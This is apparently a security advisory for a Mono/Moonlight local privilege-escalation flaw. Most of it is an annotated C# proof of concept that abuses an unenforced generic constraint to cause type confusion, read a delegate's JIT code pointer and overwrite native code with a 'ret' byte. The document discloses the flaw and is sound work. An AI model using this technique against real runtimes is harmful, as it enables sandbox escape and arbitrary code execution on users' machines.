Mono/Moonlight suffers from a local privilege escalation vulnerability.
dbb7e39dc55c86d76a0dd4ef8dadef2773134510e6cf07fbbc3bf405f1dcc77d
Mono and Moonlight are prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.
PoC:
using System;
using System.Reflection;
using System.Runtime.InteropServices;
/// <summary>
/// Stand-in type with a single pointer-sized public field. The PoC reads
/// <c>method_ptr</c> from a <see cref="Delegate"/> instance that has been
/// mis-typed as this class, so the field is never populated through this type.
/// </summary>
// NOTE(review): the field presumably lines up with the runtime's internal delegate
// field that holds the compiled code address. That layout is runtime-specific and
// is not shown on this page - confirm against the affected runtime's sources.
public class DelegateWrapper {
public IntPtr method_ptr;
}
/// <summary>Parameterless, void-returning delegate type used for the test callback in <c>Main</c>.</summary>
public delegate void MethodWrapper ();
/// <summary>
/// Proof of concept for the advisory: it instantiates a generic method with a type
/// argument that violates the method's constraint, which yields a reference whose
/// static type (<see cref="DelegateWrapper"/>) does not match the object it points
/// to (a <see cref="Delegate"/>). Every later step depends on that type confusion.
/// </summary>
public class BreakSandbox {
/// <summary>
/// Identity conversion that is type-safe only while the constraint
/// <c>T : DelegateWrapper</c> is enforced: the return is an implicit upcast
/// with no runtime check of its own.
/// </summary>
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;
}
/// <summary>
/// Builds <c>Convert&lt;Delegate&gt;</c> through reflection and calls it, returning
/// <paramref name="del"/> typed as a <see cref="DelegateWrapper"/>.
/// </summary>
/// <param name="del">Delegate instance to be reinterpreted.</param>
/// <returns>The same object reference, statically typed as <see cref="DelegateWrapper"/>.</returns>
private static DelegateWrapper ConvertDelegate (Delegate del) {
// Reflection is needed because the method is private and, more importantly, because
// the compiler would reject Convert<Delegate> at compile time.
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
// Delegate does not derive from DelegateWrapper, so this instantiation violates the
// constraint. MakeGenericMethod is documented to throw ArgumentException in that case;
// a runtime that returns normally here is the condition this PoC detects.
var gm = m.MakeGenericMethod (typeof (Delegate));
// Static method, so the target (first argument) is null.
var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);
return d (del);
}
/// <summary>
/// Runs the demonstration: invoke a delegate, obtain a mis-typed view of it, write one
/// byte through the pointer read from that view, then invoke the delegate again.
/// </summary>
/// <param name="args">Unused.</param>
public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");
};
// First call prints "Hello". NOTE(review): presumably it also ensures the anonymous
// method has been compiled, so that a code address exists - confirm.
d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
// (WX = writable and executable; 0xc3 is the single-byte x86 'ret' opcode.) The write
// lands only because the JIT code page is writable while executable, per the original
// comment above; memory that is never both would make this write fault.
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
// Second call: on an affected runtime this presumably returns without printing, which
// shows that managed code altered native code. A runtime that enforces the constraint
// never gets here, because ConvertDelegate has already thrown.
d ();
}
}